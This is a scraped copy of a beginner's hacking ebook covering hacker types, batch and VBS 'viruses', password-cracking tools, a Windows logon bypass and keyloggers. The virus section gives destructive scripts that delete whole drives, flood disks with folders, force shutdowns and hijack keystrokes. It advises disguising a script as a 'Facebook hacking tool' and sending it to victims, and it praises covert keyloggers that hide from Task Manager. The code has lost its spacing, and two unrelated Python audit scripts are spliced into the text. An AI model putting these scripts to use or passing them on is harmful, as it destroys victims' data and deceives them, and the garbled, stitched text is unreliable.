Post on 09-Dec-2015
BY: UJJWAL SAHAY, CO-FOUNDER [www.thebigcomputing.com]
FIND OUT MORE STUFF LIKE THIS ON TheBigComputing.com
We cover unique Ethical Hacking and Performance improvement guides, News and Tutorials. Our aim is to make your digital life easy, pleasant and secure. Ujjwal is a regular author and also chief security administrator at the place, you can get solution of your queries.
LEGAL DISCLAIMER
Any proceedings or activities regarding the material contained within this volume are exclusively your liability. The misuse and mistreatment of the information/tutorial in this book can result in unlawful charges brought against the persons in question. The authors and review analyzers will not be held responsible in the event any unlawful charges are brought against any individuals by misusing the information in this book to break the law. This book contains material and resources that can be potentially destructive or dangerous. If you do not fully comprehend something in this book, don't study this book. Please refer to the laws and acts of your state/region/province/zone/territory or country before accessing, using, or in any other way utilizing these resources. These materials and resources are for educational and research purposes only. Do not attempt to violate the law with anything enclosed here within. If this is your intention, then leave now. Neither the writer of this book, review analyzers, the publisher, nor anyone else affiliated in any way, is going to admit any responsibility for your proceedings, actions or trials.
ABOUT THE AUTHOR…
UJJWAL SAHAY is a sovereign Computer Security Consultant and has state-of-the-art familiarity in the field of computer. Also, UJJWAL SAHAY is a cyber-security expert certified by LUCIDEUS TECH and has definitive experience in the field of computers and ethical hacking. Ujjwal Sahay is the Author of the book HACK-X-CRYPT (A straightforward guide towards Ethical hacking and cyber security). Also, Ujjwal Sahay is the Co-founder of the techno-hacking website www.thebigcomputing.com, he is the chief security consultant of site. Sahay is however, more well known for his significant work in the field of ethical hacking and cyber security. Sahay is currently pursuing his studies in computer science with specialization in cyber security at MITS GWALIOR. Get In Touch With Him At ujjwal@thebigcomputing.com
PREFACE
Computer hacking is the practice of altering computer hardware and software to carry out a goal outside of the creator's original intention. People who engage in computer hacking actions and activities are often called hackers. The majority of people assume that hackers are computer criminals. They fail to identify the fact that criminals and hackers are two entirely unrelated things. Hackers in reality are good and extremely intelligent people, who by using their knowledge in a constructive way help organizations, companies, government, etc. to secure credentials and secret information on the Internet. Years ago, no one had to worry about Crackers breaking into their computer and installing Trojan viruses, or using your computer to send attacks against others. Now that things have changed, it's best to be aware of how to defend your computer from damaging intrusions and prevent black hat hackers. So, in this Book you will uncover the finest ways to defend your computer systems from the hackers. This Book is written keeping one object in mind: that a beginner, who is not much familiar with computer hacking, can easily attempt these hacks and recognize what we are trying to demonstrate. After reading this book you will come to recognize how hacking is affecting our everyday routine work and can be very hazardous in many fields like bank account hacking etc. Moreover, after working through this volume in detail you will be capable of understanding how a hacker hacks and how you can defend yourself from these threats.
FOR ANY QUERIES AND SUGGESTIONS FEEL FREE TO CONTACT ME: ujjwal@thebigcomputing.com
In The Loving Memory of my DAD
Your hands so warm
Your voice so clear
I still remember your laughter
Like yesterday had never gone
I miss your words of encouragement
Words that kept me hanging on
Now you are gone
The tears keep flowing
Only hoping
That one day the pain will fade
Dad why did you have to go away
We love you and miss you
I know I will again see you someday
ACKNOWLEDGEMENTS…
Book or volume of this temperament is tremendously complex to write, particularly without support of the Almighty GOD. I am highly thankful to LATE DR. BAKSHI KAMESHWAR SRIVASTAVA, MRS. SHASHI BALA SRIVASTAVA, Mr. BAKSHI RAJESH PRASAD SINHA AND MRS. ARADHNA SINHA to trust on my capabilities, without their support and motivation it would not be promising to write this book. I express heartfelt credit to My Parents LATE PROF. SAMIR KUMAR SAHAY and MRS. SUMAN SAHAY without them I have no existence. I am also thanking MR. BAKSHI RAJEEV PRASAD SINHA, MRS. ANITA SINHA, MR. BAKSHI SANJEEV PRASAD SINHA, MRS. PRITY SINHA, MR. RAJESHWAR PRASAD and MRS. PUNAM SINHA who helped me at each and every step of my life by their precious support.
I am more than ever thankful to my colleague Saurabh Tripathi (Creative head @ THE BIG COMPUTING) for the review, analysis and suggestions for some good articles for this book and all individuals who facilitated me at various research stages of this volume.
UJJWAL SAHAY
FOOLISH ASSUMPTIONS…
I make a few assumptions about you:
• You're familiar with basic computer- and networking-related concepts and terms.
• You have a basic understanding of what hackers and malicious users do.
• You have access to a computer and a network on which to use these techniques.
• You have access to the Internet to obtain the various tools used in the ethical hacking process.
• You have permission to perform the hacking techniques described in this book.
Table of Contents
INTRODUCTION TO HACKERS
Communities of Hackers
INTENSION OF HACKERS
Types of Hackers
• White Hat Hackers
• Black Hat Hackers
• Grey Hat Hackers
CRACKERS
Intension of crackers
PHREAKS
Intention of phreaks
SCRIPT KIDDIES
Intention of script kiddies
Black Hat Hackers Strategy
HACKERS WANT YOUR PC
CREATION OF VIRUS IN NOTEPAD
1.) To create a huge amount of folders on victim's desktop screen
2.) To create more folders in C, D, and E drive of victim's computer
3.) To format C, D: and E: drive of your computer
4.) Convey your friend a little message and shut down his/her computer
5.) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out
6.) Hack your friend's keyboard and make him type "You are a fool" simultaneously
7.) Open Notepad continually in your friend's computer
8.) THREATEN YOUR FRIEND BY MAKING SCREEN FLASH
Convert Batch files into Executable Programs
HACKING "OPEN" OPTION
PASSWORD CRACKING
Cracking passwords with hardcore tools
Password-cracking software
Cain & Abel
Brutus
Elcomsoft Distributed Password Recovery
Elcomsoft System Recovery
John the Ripper
ophcrack
Aircrack-NG
Proactive System Password Recovery
RainbowCrack
pwdump3
PASSWORD CREATING POLICIES
BYPASS WINDOWS LOGON SCREEN PASSWORD
KEYSTROKE LOGGING
Learn How to Hack Windows Experience Index
HACK TO HIDE LOCAL DRIVES
FORMAT HARD DISK WITH NOTEPAD
FUNNY VIRUS TO SHOCK YOUR FRIENDS
HOW TO CHANGE YOUR PROCESSOR NAME
HOW TO MAKE YOUR GOOGLE SEARCHES EFFECTIVE
IOS PASSWORD CRACKING
HACK TO HIDE THE RECYCLE BIN
HOW BOTNET DDoS ATTACK WORKS
DDoS Attack?
Botnet?
Botnet Tools
SlowLoris
Tor's Hammer
Qslowloris
Apache Killer
PyLoris
DDoSim
Botnet DDoS Attacks
WEBSITE HACKING
TESTING SQL INJECTION BY USING TOOL
WI-FI HACKING USING BACKTRACK
NEWBIE'S WAY TOWARDS REVERSE ENGINEERING
EMAIL AND FACEBOOK HACKING BY PHISHING
Securing Pen Drives From Malicious Viruses
HOW TO PROTECT YOUR PDF FILES FROM COPYING
SENDING A MESSAGE TO OTHER USER IN YOUR PC
HOW TO CREATE A FOLDER WITH EMPTY NAME
HACKING ANDROID PHONE
FULL CONTROL YOUR PC BY PHONE
LAUNCHING WINDOWS GOD MODE
HOW TO CRACK ANDROID LOCK SCREEN
WI-FI CRACKING USING REAVER IN BACKTRACK
SOME USEFUL WINDOWS SHORTCUTS
HOW TO RECOVER PERMANENTLY DELETED FILES
CONCLUSION
Let's start
INTRODUCTION
INTRODUCTION TO HACKERS
First of all, before digging into intense hacking processes, let's take a look at what hacking is, who the hackers are, what their intentions are, the types of hackers and their communities etc.
Communities of Hackers:
• HACKERS
• CRACKERS
• PHREAKS
• SCRIPT KIDDIES
HACKERS are the Intelligent Computer Experts.
INTENSION OF HACKERS:
• To gain in-depth knowledge of any computer system: what is happening at the backend of any specific program of the system, behind the screen of the computer system.
• Their motive is to find possible security risks and vulnerabilities in a computer system or network.
• They create security awareness among the people by sharing knowledge and the proper security precautions that should be taken by the user.
Types of Hackers:
• White Hat Hackers – "White hats" is the name used for security experts. While they often use the same tools and techniques as the black hats, they do so in order to foil the bad guys. That is, they use those tools for ethical hacking and computer forensics. Ethical hacking is the process of using security tools to test and improve security (rather than to break it!). Computer forensics is the process of collecting evidence needed to identify and convict computer criminals.
• Black Hat Hackers – They use their knowledge and skill set for illegal activities and destructive intents. Obviously, the "black hats" are the bad guys. These are the people who create and send viruses and worms, break into computer systems, steal data, shut down networks, and basically commit electronic crimes. We talk about black hats at several points in this book. Black hat hackers and malware writers are not considered as the same thing in the security community, even though they are both breaking the law.
• Grey Hat Hackers – They use their knowledge and skill set for legal and illegal purposes. They are white hats in public but internally they do some black hat work. Gray hats sit in the middle of the fence because sometimes they cross that ethical line (or more often, define it differently). For example, gray hats will break into a company's computer system just to wander around and see what's there. They think that simply because they don't damage any data, they're not committing a crime. Then they go and apply for jobs as security consultants for large corporations. They justify their earlier break-in as some sort of computer security training. Many really believe that they're providing a public service by letting companies know that their computers are at risk.
CRACKERS are those who break into applications with some malicious intentions, either for their personal gain or their greedy achievements.
Intension of crackers:
• Their motive is to get unauthorized access into a system and cause damage or destroy or reveal confidential information.
• To compromise the system to deny services to legitimate users for troubling, harassing them or for taking revenge.
• It can cause financial losses & image/reputation damages, defamation in the society for individuals or organizations.
PHREAKS are those people who use computer devices and software programs and their tricky and sharp mind to break into the phone networks.
Intention of phreaks:
• To find loopholes in security in the phone network and to make phone calls and access internet at free of cost!!! You may get a spoofed call or a big amount of bill. You can also get a call with your own number.
SCRIPT KIDDIES: These are computer novices who take advantage of the hacker tools, vulnerability scanners, and documentation available free on the Internet but who don't have any real knowledge of what's really going on behind the scenes. They know just enough to cause you headaches but typically are very sloppy in their actions, leaving all sorts of digital fingerprints behind. Even though these guys are the stereotypical hackers that you hear about in the news media, they often need only minimal skills to carry out their attacks.
Intention of script kiddies:
• They use the available information about known vulnerabilities to break into the network systems.
• It's an act performed for fun or out of curiosity.
Black Hat Hackers Strategy:
• Information Gathering & Scanning
• Getting Access on the website
• Maintain the access
• Clear the Tracks
Conclusion: Security is important because prevention is better than cure.
HACKERS WANT YOUR PC
You might be thinking that hackers don't care about your computer, but they do. Hackers want access to your system for many different reasons. Remember, once a hacker breaks in and plants a Trojan, the door is open for anyone to return. The hackers know this and are making money off of it. They know it's easy to hide and very difficult to track them back once they own your PC.
Overall, the Internet is an easy place to hide. Compromised computers around the world have helped to make hiding simple. It is easy to find the last IP address from where an attack was launched, but hackers hop through many unsecured systems to hide their location before they launch attacks.
An IP address is a unique address that identifies where a computer is connected to the Internet. Every computer, even yours if you're using broadband access, has an Internet protocol (IP) address.
Over the past four years, most cyber-attacks have been launched from computers within INDIA. However, this doesn't mean that systems in INDIA are the original source of the attack. A hacker in Pakistan could actually use your computer to launch a denial of service (DOS) attack. To the entire world, it might even look as if you started the attack because the hacker has hidden his tracks so that only the last "hop" can be traced.
VIRUS CREATIONS
CREATION OF VIRUS IN NOTEPAD
Now, it's time to administrate your computer by creating some viruses in the form of batch file. You can create various types of viruses with having distinct functionality. Each and every virus will affect the victim's computer system by the way you have coded its programming in the batch file. You can create viruses which can freeze the victim's computer or it can also crash it.
Virus creation codes of the batch file:
- Codes to be written in the notepad
- Extension of the files should be ".bat"
1.) To create a huge amount of folders on victim's desktop screen:
First of all your task is to copy the following codes in the notepad of your computer. For opening the notepad: Go to run option of your computer by pressing "window+R". Simply type "notepad" and click on the OK option.
CODES:@echooff:topmd%random%gototop.
Now when you have copied the codes in the notepad your next work is to save the text document you have created. Go to file option and save your document by any name but don't forget to keep the extension as ".bat".
For example you can save your text document by the name "ujjwal.bat".
Or you can also keep your document name as "Facebook hacking tool.bat" to confuse the victim and enforce him to open the virus you have created to destroy the desktop of the victim.
When you have done saving the document just double click on the batch file to open it.
Suddenly you will see that the command prompt of the victim's computer opened automatically and it will display large amount of codes running in the command prompt. After 5-10 seconds you will see that there are a huge amount of folders created automatically on the desktop of the victim and it will also lead the desktop to freeze or crash.
2.) To create more folders in C, D, and E drive of victim's computer:
As we have learned above to create many folders on the desktop of the victim, in the same way we can create a lot of folders in the C:, D:, and E: drives of the victim's computer by applying the same method as we have followed above, but there is a little amendment in the codes of the batch file of this virus.
CODES:@echooff
:VIRUScd/dC:md%random%cd/dD:md%random%cd/dE:md%random%gotoVIRUS
Copy and paste the above code in the notepad and follow the same steps as we have followed before to create more numbers of folders in the local drives of the victim's computer.
3.) To format C, D: and E: drive of your computer:
OpenNotepadCopythebelowcommandthere“rd/s/qD:\rd/s/qC:\rd/s/qE:"(Withoutquotes)Saveas“anything.bat
Double click on the virus icon. This virus formats the C, D and E Drive in 5 Seconds.
4.) Convey your friend a little message and shut down his/her computer:
@echooffmsg*Idon’tlikeyoushutdown-c“Error!Youaretoostupid!”-s
Save it as "Anything.BAT" in All Files and send it.
5.) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Openthenotepadandtypethefollowingcode:WScript.Sleep180000WScript.Sleep10000SetWshShell=WScript.CreateObject(“WScript.Shell”)WshShell.Run“notepad”WScript.Sleep100WshShell.AppActivate“Notepad”WScript.Sleep500WshShell.SendKeys“Hel”WScript.Sleep500WshShell.SendKeys“lo“WScript.Sleep500WshShell.SendKeys“,ho”WScript.Sleep500WshShell.SendKeys“wa”WScript.Sleep500WshShell.SendKeys“re“WScript.Sleep500WshShell.SendKeys“you”WScript.Sleep500WshShell.SendKeys“?”WScript.Sleep500WshShell.SendKeys“Ia”WScript.Sleep500WshShell.SendKeys“mg”WScript.Sleep500WshShell.SendKeys“ood”WScript.Sleep500WshShell.SendKeys”th”WScript.Sleep500WshShell.SendKeys“ank”WScript.Sleep500
WshShell.SendKeys“s!“
Save it as "Anything.VBS" and send it.
6.) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Open the notepad and type the following codes:
SetwshShell=wscript.CreateObject(“WScript.Shell”)dowscript.sleep100wshshell.sendkeys“Youareafool.”loop
Save it as "Anything.VBS" and send it.
7.) Open Notepad continually in your friend's computer:
Openthenotepadandtypethefollowingcodes:@ECHOoff:topSTART%SystemRoot%\system32\notepad.exeGOTOtop
Save it as "Anything.BAT" and send it.
8.) THREATEN YOUR FRIEND BY MAKING SCREEN FLASH
To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.
@echooffechoe100B81300CD10E44088C3E44088C7F6E330>\z.dbgechoe110DF88C1BAC80330C0EEBADA03ECA80875>>\z.dbgechoe120FBECA80874FBBAC90388D8EE88F8EE88>>\z.dbgechoe130C8EEB401CD1674CDB80300CD10C3>>\z.dbgechog=100>>\z.dbgechoq>>\z.dbgdebug<\z.dbg>nuldel\z.dbg
But if you really want to mess with a friend then copy and paste the following code, which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
Codes:
@echooff:aechoe100B81300CD10E44088C3E44088C7F6E330>\z.dbgechoe110DF88C1BAC80330C0EEBADA03ECA80875>>\z.dbgechoe120FBECA80874FBBAC90388D8EE88F8EE88>>\z.dbgechoe130C8EEB401CD1674CDB80300CD10C3>>\z.dbgechog=100>>\z.dbgechoq>>\z.dbgdebug<\z.dbg>nuldel\z.dbggotoa
To disable error (Ctrl+Shift+Esc) then end process wscript.exe. Enjoy!!!
Note:- some of the above given codes can harm your computer after execution so; don't try it on your pc. You can use a test computer for it.
BATCH TO EXE CONVERSION
Convert Batch files into Executable Programs
Batch files and executable files work in an almost similar way. Basically both are a set of instructions and logic for command execution. But we prefer executable files, as they are more convenient than batch ones. But why would we want that? Some of the reasons are listed below:
1. We can include extra tools in our EXE dependent batch file.
2. Moreover EXE provides protection to the source script to restrict modification.
3. EXE files can be pinned to the Windows start menu as well as to the taskbar.
Here we are using a tool called "Batch to exe converter" which provides you a platform to run the batch files as executable files. You can download it from here
"Bat to Exe Converter" is a flow conversion program whose purpose is to help you to easily obtain executable files out of batch items. If you prefer to convert a BATCH file into an executable one easily, "Bat to Exe Converter" is a simple and yet effective solution.
The application provides you with a simplified interface, which makes it comfortable for both beginner and advanced users. From its primary window, you have the ability to select the desired batch file and output file. Then, you will be able to customize your settings according to your choice and preferences.
Another interesting and compatible feature is that you can choose the language for your EXE file, the choices being English or German. From the Options tab, users can opt to create a visible or invisible application, which means displaying a console window or not. However, if you want to encrypt the resulting EXE file, you can protect it with a security password.
MESSING UP WITH REGISTRY
HACKING "OPEN" OPTION
If we want to open any folder, either we double click on the folder or we just right click on the folder and it will show us a dialogue box with the OPEN option at the top of the dialogue box.
And today we are going to learn how to hack the "OPEN" option with any text by which you want to replace it.
STEPS:
Go to the "run" option, type "regedit" and click on ok.
Note: "regedit" stands for registry editing.
Registry:- it is responsible for saving the binary equivalent working of every application in operating system.
Then a registry editing window will open in front of you. It has five options.
1. HKEY_CLASSES_ROOT
2. HKEY_CURRENT_USER
3. HKEY_LOCAL_MACHINE
4. HKEY_USERS
5. HKEY_CURRENT_CONFIG
Then you have to click on "HKEY_CLASSES_ROOT". It will open and you see a lot of items under it. Search for the "FOLDER" option under it.
Click on the folder option to open it. When you open the folder option you will see the "SHELL" option. By opening the "SHELL" option you will see the "OPEN" option under it. Just give a single click on the open option instead of opening it. You will see two items defined in the left white workspace.
Just open the "Default" string (1st option). Do not touch the value name. Type anything by which you want to replace your "open" option.
For example I am typing here "your computer is hacked by Ujjwal Sahay".
Then click on the ok option. Now go to any folder and just give a right click to it.
Woooooo! Now the open option is changed to the text "your computer is hacked by Ujjwal Sahay".
PASSWORD CRACKING EXPLAINED
PASSWORD CRACKING
Password crackers are the most famous and elementary tools in the hacker's toolbox. These have been around for some time and are fairly effective at "guessing" most users' passwords, at least in part because most users do a very poor job of selecting secure passwords.
First of all, if a hacker is going to crack your password, then at the very first step they usually try some guesses. They generally make this easy by social engineering. Hackers know that most users select simple passwords that are easy to remember. The top choices of the users are nearly always names that are personally meaningful to the user: first names of immediate family members lead the list, followed by pets' names and favorite sporting teams. Password crackers may end up loading full English dictionaries, but they can hit a fair number of passwords with the contents of any popular baby name book. Other poor password selections include common numbers and numbers that follow a common format such as phone numbers and social security numbers.
Compounding the problem, many users set the same user name and password for all accounts, allowing hackers to have a field day with a single harvested password. That's something to consider before you use the same password for Facebook as you use at school or at work. The key to creating a good password is to create something that someone cannot guess or easily crack. Using your pet's name therefore is not a good technique. Using your login name is also a bad technique because someone who knows your login (or your name, since many login names are simply variations on your surname) could easily break into your system.
Cracking passwords with hardcore tools
High-tech password cracking involves using a program that tries to guess a password by determining all possible password combinations. These high-tech methods are mostly automated after you access the computer and password database files. The main password-cracking methods are dictionary attacks, brute force attacks, and rainbow attacks. You find out how each of these work in the following sections.
Password-cracking software:
You can try to crack your organization's operating system and application passwords with various password-cracking tools:
Cain & Abel: Cain and Abel is a well-known password cracking tool that is capable of handling a variety of tasks. The most notable thing is that the tool is only available for Windows platforms. It can work as a sniffer in the network, cracking encrypted passwords using the dictionary attack, brute force attacks, cryptanalysis attacks, revealing password boxes, uncovering cached passwords, decoding scrambled passwords, and analyzing routing protocols. It is used to crack LM and NT LanManager (NTLM) hashes, Windows RDP passwords, Cisco IOS and PIX hashes, VNC passwords, RADIUS hashes, and lots more. (Hashes are cryptographic representations of passwords.)
Brutus: Brutus is one of the most popular remote online password cracking tools. It claims to be the fastest and most flexible password cracking tool. This tool is free and is only available for Windows systems. It was released back in October 2000.
It supports HTTP (Basic Authentication), HTTP (HTML Form/CGI), POP3, FTP, SMB, Telnet and other types such as IMAP, NNTP, NetBus, etc. You can also create your own authentication types. This tool also supports multi-stage authentication engines and is able to connect to 60 simultaneous targets. It also has resume and load options. So, you can pause the attack process any time and then resume whenever you want.
Elcomsoft Distributed Password Recovery: (www.elcomsoft.com/edpr.html) cracks Windows, Microsoft Office, PGP, Adobe, iTunes, and numerous other passwords in a distributed fashion using up to 10,000 networked computers at one time. Plus, this tool uses the same graphics processing unit (GPU) video acceleration as the Elcomsoft Wireless Auditor tool, which allows for cracking speeds up to 50 times faster.
Elcomsoft System Recovery: (www.elcomsoft.com/esr.html) cracks or resets Windows user passwords, sets administrative rights, and resets password expirations, all from a bootable CD.
John the Ripper: (www.openwall.com/john) John the Ripper is another well-known free open source password cracking tool for Linux, UNIX and Mac OS X. A Windows version is also available. This tool can detect weak passwords. A pro version of the tool is also available, which offers better features and native packages for target operating systems.
ophcrack: (http://ophcrack.sourceforge.net) cracks Windows user passwords using rainbow tables from a bootable CD. Rainbow tables are pre-calculated password hashes that can help speed up the cracking process.
Aircrack-NG: (http://www.aircrack-ng.org/) Aircrack-NG is a WiFi password cracking tool that can crack WEP or WPA passwords. It analyzes wireless encrypted packets and then tries to crack passwords via its cracking algorithm. It is available for Linux and Windows systems. A live CD of Aircrack is also available.
Proactive System Password Recovery: (www.elcomsoft.com/pspr.html) recovers practically any locally stored Windows password, such as logon passwords, WEP/WPA passphrases, SYSKEY passwords, and RAS/dialup/VPN passwords.
RainbowCrack: (http://project-rainbowcrack.com) RainbowCrack is a hash cracker tool that uses a large-scale time-memory tradeoff process for faster password cracking than traditional brute force tools. Time-memory tradeoff is a computational process in which all plain text and hash pairs are calculated by using a selected hash algorithm. After computation, results are stored in the rainbow table. This process is very time consuming. But, once the table is ready, it can crack a password much faster than brute force tools.
You also do not need to generate rainbow tables by yourselves. Developers of RainbowCrack have also generated LM rainbow tables, NTLM rainbow tables, MD5 rainbow tables and Sha1 rainbow tables. Like RainbowCrack, these tables are also available for free. You can download these tables and use them for your password cracking processes.
pwdump3: (www.openwall.com/passwords/microsoftwindowsnt-2000-xp-2003-vista-7#pwdump) extracts Windows password hashes from the SAM (Security Accounts Manager) database.
Password storage locations vary by operating system:
Windows usually stores passwords in these locations:
• Security Accounts Manager (SAM) database (c:\winnt\system32\config) or (c:\windows\system32\config)
• Active Directory database file that's stored locally or spread across domain controllers (ntds.dit)
Windows may also store passwords in a backup of the SAM file in the c:\winnt\repair or c:\windows\repair directory.
Some Windows applications store passwords in the Registry or as plaintext files on the hard drive! A simple registry or file-system search for "password" may uncover just what you're looking for.
Linux and other UNIX variants typically store passwords in these files:
• /etc/passwd (readable by everyone)
• /etc/shadow (accessible by the system and the root account only)
• /.secure/etc/passwd (accessible by the system and the root account only)
• /etc/security/passwd (accessible by the system and the root account only)
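Because /etc/passwd is readable by everyone while /etc/shadow is not, an administrator should confirm that no hash or empty password sits in the world-readable file and that the shadow file keeps its restrictive mode. The following Python audit is an added example, not code from the book; the sample file contents and function names are constructed for illustration.

```python
import stat

# Constructed sample data (not taken from a real system).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
legacy:$6$c0nstructed$notARealHashValue:1001:1001::/home/legacy:/bin/sh
guest::1002:1002::/home/guest:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""
SAMPLE_SHADOW = """\
root:$6$c0nstructed$anotherFakeHash:19000:0:99999:7:::
alice::19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
"""


def audit_passwd(text):
    """Flag passwd entries whose password field is not delegated to shadow."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            findings.append((user, "empty password field: account has no password"))
        elif pw != "x" and not pw.startswith(("*", "!")):
            # Anything else is a hash that every local user can read and crack offline.
            findings.append((user, "password hash stored in world-readable passwd"))
    return findings


def audit_shadow(text):
    """Flag shadow entries with an empty hash field (login without a password)."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 2:
            findings.append((fields[0], "malformed entry"))
        elif fields[1] == "":
            findings.append((fields[0], "no password set in shadow"))
    return findings


def shadow_mode_findings(mode):
    """Check permission bits (as returned in os.stat().st_mode) of the shadow file."""
    out = []
    if mode & stat.S_IROTH:
        out.append("shadow file is world-readable")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        out.append("shadow file is writable by non-owner")
    return out


if __name__ == "__main__":
    for user, issue in audit_passwd(SAMPLE_PASSWD) + audit_shadow(SAMPLE_SHADOW):
        print(f"{user}: {issue}")
    print(shadow_mode_findings(0o644))
```

On a live host, pass the contents of the real files and `os.stat("/etc/shadow").st_mode` to the same functions; reading /etc/shadow requires root.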
MUST HAVE PASSWORD POLICIES
PASSWORD CREATING POLICIES
As an ethical hacker, you should show users the importance of securing their passwords. Here are some tips on how to do that:
Demonstrate how to create secure passwords: generally people create their passwords using only words, which can be less secure.
Show what can happen when weak passwords are used or passwords are shared.
Diligently build user awareness of social engineering attacks.
Encourage the use of a strong password-creation policy that includes the following criteria:
Use punctuation characters to separate words.
Use upper and lowercase letters, special characters, and numbers. Never use only numbers. Such passwords can be cracked quickly.
Change passwords every 15 to 30 days or immediately if they're suspected of being compromised.
Use different passwords for each system. This is especially important for network infrastructure hosts, such as servers, firewalls, and routers. It's okay to use similar passwords, just make them slightly different for each type of system, such as wweraw777-Win7 for Windows systems and wweraw453 for Linux systems.
Use variable-length passwords. This trick can throw off attackers because they won't know the required minimum or maximum length of passwords and must try all password length combinations.
Don't use common slang words or words that are in a dictionary.
Don't rely completely on similar-looking characters, such as 3 instead of E, 5 instead of S, or ! instead of 1. Password-cracking programs can check for this.
Use password-protected screen savers. Unlocked screens are a great way for systems to be compromised even if their hard drives are encrypted.
Don't reuse the same password within at least four to five password changes.
Don't share passwords. To each his or her own!
Avoid storing user passwords in an unsecured central location, such as an unprotected spreadsheet on a hard drive. This is an invitation for disaster. Use Password Safe or a similar program to store user passwords.
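Several of the criteria above can be enforced at password-change time. The following Python checker is an added example, not code from the book: it rejects digits-only passwords, requires mixed character classes, undoes look-alike characters before the dictionary check, rejects the login name, and refuses reuse within the last five changes. The word list, the extra look-alike pairs and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import os
import string

# Look-alike substitutions undone before the dictionary check. "3 for E" and
# "5 for S" are the page's examples; the remaining pairs are assumptions.
LOOKALIKES = str.maketrans({"3": "e", "5": "s", "!": "i", "1": "i",
                            "0": "o", "@": "a", "$": "s"})

# Tiny constructed word list; a real deployment would load a full dictionary.
WORDLIST = {"password", "dragon", "monkey", "letmein", "football", "welcome"}

HISTORY_DEPTH = 5  # the page says "four to five password changes"


def normalise(text):
    """Lower-case, undo look-alike characters, keep letters only."""
    return "".join(c for c in text.lower().translate(LOOKALIKES) if c.isalpha())


def history_entry(password, salt=None):
    """Salted PBKDF2 digest, so the history never holds plaintext passwords."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest


def reused(password, history):
    """True if the password matches one of the most recent history entries."""
    recent = list(history)[-HISTORY_DEPTH:]
    return any(hmac.compare_digest(history_entry(password, salt)[1], digest)
               for salt, digest in recent)


def check_password(password, login, history=()):
    """Return a list of policy violations; an empty list means accepted."""
    problems = []
    if password.isdigit():
        problems.append("digits only")
    missing = [name for name, present in (
        ("lowercase", any(c.islower() for c in password)),
        ("uppercase", any(c.isupper() for c in password)),
        ("digit", any(c.isdigit() for c in password)),
        ("special character", any(c in string.punctuation for c in password)),
    ) if not present]
    if missing:
        problems.append("missing: " + ", ".join(missing))
    flat = normalise(password)
    for word in sorted(WORDLIST):
        if word in flat:
            problems.append(f"dictionary word '{word}' (look-alikes undone)")
    name = normalise(login)
    if name and name in flat:
        problems.append("contains the login name")
    if reused(password, history):
        problems.append(f"reused within the last {HISTORY_DEPTH} passwords")
    return problems


if __name__ == "__main__":
    for candidate in ("12345678", "Pa55w0rd!", "Al1ce#Tree9x", "wweraw777-Win7"):
        print(candidate, "->", check_password(candidate, "alice") or "accepted")
```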
KON BOOT
BYPASS WINDOWS LOGON SCREEN PASSWORD
Sometimes it creates a critical condition if you forgot your Windows administrator password and it's quite urgent to recover it without any flaw. This article will make it convenient to recover your admin password.
We are using a tool named KON-BOOT.
Kon-Boot is an application which will bypass the authentication process of Windows based operating systems. It enables you to log in to any password protected test machine without any knowledge of the password.
Kon-Boot works with both 64-bit and 32-bit Microsoft Windows operating systems.
Needy things:
– A Pen Drive or any USB device such as a Memory Card, or a blank CD.
– Kon-Boot (latest version)
– Your 5 minutes and also a working mind.
Technical instructions:
1. Download KON-BOOT from internet.
2. Extract the ZIP and run the "KonBootInstaller.exe"
3. Burn the ISO.
4. Boot from CD/USB device.
5. After Windows is loaded it will show you a Kon-boot screen.
6. Leave the password box empty and just hit OK; it will directly enable you into the Windows account.
Limitations: IT MAY CAUSE BSOD (NOTEPAD PARTICULAR BUGS).
KEYLOGGERS
BE AWARE KEYSTROKE LOGGING
One of the best techniques for capturing passwords is remote keystroke logging: the use of software or hardware to record keystrokes as they're typed into the computer.
Generally you ask your friends or relatives to let you log in to your account from their computers.
So, be careful with keyloggers installed on their computers. Even with good intentions, monitoring employees raises various legal issues if it's not done correctly. Discuss with your legal counsel what you'll be doing, ask for their guidance, and get approval from upper management.
Logging tools: With keystroke-logging tools, you can assess the log files of your application to see what passwords people are using. Keystroke-logging applications can be installed on the monitored computer. I suggest you check out family key logger by (www.spyarsenel.com). Another popular tool is Invisible KeyLogger Stealth; dozens of other such tools are available on the Internet.
One more you can check out is KGB employee monitor, one of my favorites, because it is not only invisible but also will not be shown by your task manager, and it uses password protection too.
Hardware-based tools, such as KeyGhost (www.keyghost.com), fit between the keyboard and the computer or replace the keyboard altogether. A keystroke-logging tool installed on a shared computer can capture the passwords of every user who logs in.
PREVENTIONS:
The best defense against the installation of keystroke-logging software on your systems is to use an anti-malware program that monitors the local host. It's not foolproof but can help. As for physical keyloggers, you'll need to visually inspect each system.
The potential for hackers to install keystroke-logging software is another reason to ensure that your users aren't downloading and installing random shareware or opening attachments in unsolicited emails. Consider locking down your desktops by setting the appropriate user rights through local or group security policy in Windows.
DO YOU HAVE RATED 7.9?
Learn How to Hack Windows Experience Index
Starting from Windows Vista, Microsoft introduced a kind of benchmarking system in its Operating System. In Windows Vista and 7 users can rate their PC using the Windows Experience Index. The highest possible score in Windows Vista is 5 while Windows 7 machines can go up to 7.9 in the experience index.
In the Windows Experience Index the base score is based on the lowest score of any component. For example, in the test PC it was 4.4 because of the Graphics subscore.
However it is not so tough to manipulate these numbers and change these scores according to your will. You can change these just to fool anyone.
GETTING STARTED
To keep things simple we would recommend you run the Windows Experience Index first (if you have not done so). If you have done that you can skip this section.
To do that, open Control Panel, go to System and Security and then click on Check the Windows Experience Index.
